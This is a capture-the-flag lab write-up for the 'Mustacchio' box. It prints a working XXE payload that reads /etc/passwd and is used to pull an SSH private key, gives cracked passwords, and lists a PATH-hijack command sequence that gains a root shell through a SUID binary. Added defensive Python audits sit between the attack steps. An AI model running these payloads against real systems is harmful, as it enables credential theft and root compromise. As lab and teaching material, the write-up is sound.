Mustacchio

SQLite3 - Password Cracking - XXE - Dumping SSH keys - ssh2john.py - Strings - Abusing Tail command

Initial Access

  • The given IP - 10.10.74.246

  • We can observe the open ports - 22, 80, 8765

  • Enumerating the HTTP ports (80, 8765), we find a login panel on port 8765, while port 80 serves only a stock template

  • Running a Gobuster scan on port 80 gives us the /custom/ directory; enumerating it further reveals a user.bak database file

  • We can use the SQLite3 command line tool to interact with the backup file, and after some enumeration we find a potential encrypted password for the user admin

  • Using John we cracked the password - bulldog19

  • Logging in to the panel, we find a text field that is supposed to accept a comment for the website

  • Examining the source of port 8765, we find another interesting file called dontforget.bak in the /auth/ directory, and there is also a comment saying "Barry you can now SSH into the machine"

  • So the text field accepts XML input
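
The SQLite step above, as an added example that is not part of the original writeup: instead of only pulling a hash out of a leaked backup, this audits a users table for the storage weakness that makes such a hash crackable in the first place. The database, table layout, usernames and password hashes below are all constructed in the script (hashed from made-up passwords); nothing comes from the box.

```python
import hashlib
import re
import sqlite3

# Constructed sample rows standing in for a leaked users table. The hashes are
# computed here from made-up passwords; none of them come from the box.
SAMPLE_ROWS = [
    ("admin", hashlib.sha1(b"example-pass").hexdigest()),        # unsalted SHA-1
    ("alice", "$6$rounds=656000$" + "s" * 16 + "$" + "h" * 86),   # sha512crypt-shaped
    ("bob", hashlib.md5(b"example-pass-2").hexdigest()),          # unsalted MD5
]

# Crypt-style prefixes that indicate a salted, iterated password hash.
SALTED_PREFIX = re.compile(r"^\$(1|2[abxy]|5|6|7|y|argon2(i|d|id))\$")
# Hex digest lengths of common unsalted hashes: MD5, SHA-1, SHA-256.
UNSALTED_LENGTHS = {32: "unsalted-md5", 40: "unsalted-sha1", 64: "unsalted-sha256"}


def build_sample_db() -> sqlite3.Connection:
    """Create an in-memory database shaped like a leaked user.bak backup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def list_tables(conn: sqlite3.Connection) -> list[str]:
    """Same enumeration step as `.tables` in the sqlite3 CLI."""
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")
    return [name for (name,) in rows]


def classify_hash(value: str) -> str:
    """Label a stored credential by its format."""
    if SALTED_PREFIX.match(value):
        return "salted-crypt"
    if re.fullmatch(r"[0-9a-fA-F]+", value) and len(value) in UNSALTED_LENGTHS:
        return UNSALTED_LENGTHS[len(value)]
    return "unknown-or-plaintext"


def find_weak_credentials(conn: sqlite3.Connection) -> list[tuple[str, str]]:
    """Return (username, verdict) for every row whose password is not a salted crypt hash."""
    findings = []
    query = "SELECT username, password FROM users ORDER BY username"
    for username, stored in conn.execute(query):
        verdict = classify_hash(stored)
        if verdict != "salted-crypt":
            findings.append((username, verdict))
    return findings


if __name__ == "__main__":
    db = build_sample_db()
    print("tables:", list_tables(db))
    for user, verdict in find_weak_credentials(db):
        print(f"{user}: {verdict}")
```

An unsalted single-round digest like the admin row is exactly what a wordlist run in John recovers in seconds; the sha512crypt-shaped row is the kind of entry the audit leaves alone.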

Exploitation

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<comment>
  <name>&xxe;</name>
  <author>Akash</author>
  <com>ssup</com>
</comment>

  • This confirms an XML External Entity (XXE) injection, so we can now trick the web page into displaying Barry's SSH private key - /home/barry/.ssh/id_rsa

  • Copying that key should give us SSH access to the machine, but the connection is denied

  • Setting proper permissions - chmod 600 id_rsa - but it still denies access and asks for a password

  • Since the key is encrypted and asks for a passphrase when used directly, we used ssh2john.py to convert the contents of the key into a crackable hash

  • Using John to crack the hash gives us the passphrase - urieljames
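
The XXE step above, from the other side: an added example (not code from the original writeup) showing the check a comment handler should run before an XML parser ever sees the submission. The payload string is the one from this page; the benign comment, the field names and the function names are constructed for the example. The check rejects any DTD up front, so it does not depend on whichever parser defaults happen to be in effect.

```python
import re
import xml.etree.ElementTree as ET

# The payload from the writeup above, embedded here as test input.
XXE_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<comment>
  <name>&xxe;</name>
  <author>Akash</author>
  <com>ssup</com>
</comment>"""

# A constructed benign submission of the same shape.
BENIGN_COMMENT = """<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Visitor</name>
  <author>Visitor</author>
  <com>Nice site</com>
</comment>"""

# Any DOCTYPE is unnecessary for a comment form; an external entity is the XXE itself.
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+[^>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)

EXPECTED_FIELDS = ("name", "author", "com")


def xml_risk(text: str) -> list[str]:
    """List the reasons an untrusted XML document should be rejected before parsing."""
    reasons = []
    if DOCTYPE_RE.search(text):
        reasons.append("doctype-present")
    if EXTERNAL_ENTITY_RE.search(text):
        reasons.append("external-entity-declared")
    return reasons


def parse_comment(text: str) -> dict[str, str]:
    """Reject any DTD first, then parse only the three expected child elements."""
    reasons = xml_risk(text)
    if reasons:
        raise ValueError("rejected: " + ", ".join(reasons))
    root = ET.fromstring(text)
    if root.tag != "comment":
        raise ValueError("unexpected root element " + root.tag)
    fields = {}
    for child in root:
        if child.tag not in EXPECTED_FIELDS:
            raise ValueError("unexpected element " + child.tag)
        fields[child.tag] = (child.text or "").strip()
    return fields


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_COMMENT), ("payload", XXE_PAYLOAD)):
        try:
            print(label, "->", parse_comment(doc))
        except ValueError as exc:
            print(label, "->", exc)
```

Logging the `xml_risk` reasons on rejection also gives the application a clean detection signal: a comment form should never legitimately receive a DOCTYPE, so each rejection is worth an alert.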

Privilege Escalation

  • Digging around the box reveals the presence of another user - joe

  • His home directory contains a SUID file called live_log; executing it displays a Firefox event log, which is of no use to us. The interesting part is that it is a non-stripped ELF binary owned by the root user

  • We used the strings command to take a closer look at this binary file

  • We found that this binary runs the tail command without using its absolute path - /usr/bin/tail

  • This means we can exploit it by creating our own version of the tail command

cd /dev/shm
echo "/bin/bash" > tail
chmod 777 tail
export PATH=/dev/shm:$PATH
/home/joe/live_log
cd /root
cat root.txt

We moved to the /dev/shm directory

We created our version of the tail command but made it in such a way that it invokes the /bin/bash

We changed the permissions so that we are allowed to execute the file - 777

Next, we need to export the path so that when executed by the live_log, our version of the tail gets executed instead of the original tail

We executed the live_log file as Barry and got root access
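
The strings step above, turned into an audit: an added example (not code from the original writeup) that does what `strings` plus a careful eye did on live_log, but as a check a defender can run over every setuid-root binary on a host. It pulls printable runs out of the file and flags strings that look like a shell command whose program name carries no absolute path. The byte blob, the command strings in it and the function names are constructed for the example; the real fix for a binary like this is to call /usr/bin/tail by its absolute path (or reset PATH before spawning anything).

```python
import os
import re
import stat
import string

# Constructed stand-in for the data section of a setuid helper. The first
# command string has no absolute path (the live_log weakness); the second does.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + bytes(range(0, 32))
    + b"tail -f /var/log/nginx/access.log\x00"
    + bytes(range(128, 160))
    + b"/usr/bin/tail -n 20 /var/log/syslog\x00"
    + b"Welcome to the live log viewer\x00"
)

# Printable ASCII, minus whitespace control characters that `strings` treats as separators.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
MIN_LEN = 4

# A string "looks like a command" if, after a bare first word, it carries an
# option, an absolute-path argument, or a shell operator.
OPTION_OR_PATH = re.compile(r"(\s-{1,2}[A-Za-z]|\s/|\||;|&&|`|\$\()")


def extract_strings(blob: bytes, min_len: int = MIN_LEN) -> list[str]:
    """Mimic `strings`: return runs of printable bytes at least min_len long."""
    out, run = [], bytearray()
    for b in blob:
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode("ascii"))
    return out


def relative_command_strings(blob: bytes) -> list[str]:
    """Strings that look like a command whose program name is resolved through PATH."""
    hits = []
    for s in extract_strings(blob):
        words = s.split()
        if not words:
            continue
        program = words[0]
        if "/" not in program and OPTION_OR_PATH.search(s):
            hits.append(s)
    return hits


def is_setuid_root(path: str) -> bool:
    """True when the file is owned by uid 0 and has the setuid bit set."""
    st = os.stat(path)
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0


def audit_binary(path: str) -> dict:
    """Combine both checks for one file on disk (e.g. /home/joe/live_log)."""
    with open(path, "rb") as f:
        blob = f.read()
    return {
        "setuid_root": is_setuid_root(path),
        "relative_commands": relative_command_strings(blob),
    }


if __name__ == "__main__":
    # Offline demonstration on the constructed blob; point audit_binary at a
    # real path to check a file on a host.
    print(relative_command_strings(SAMPLE_BINARY))
```

Any setuid-root binary where `audit_binary` reports both `setuid_root` and a non-empty `relative_commands` list is a PATH-hijack candidate and should be fixed or have its setuid bit removed.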
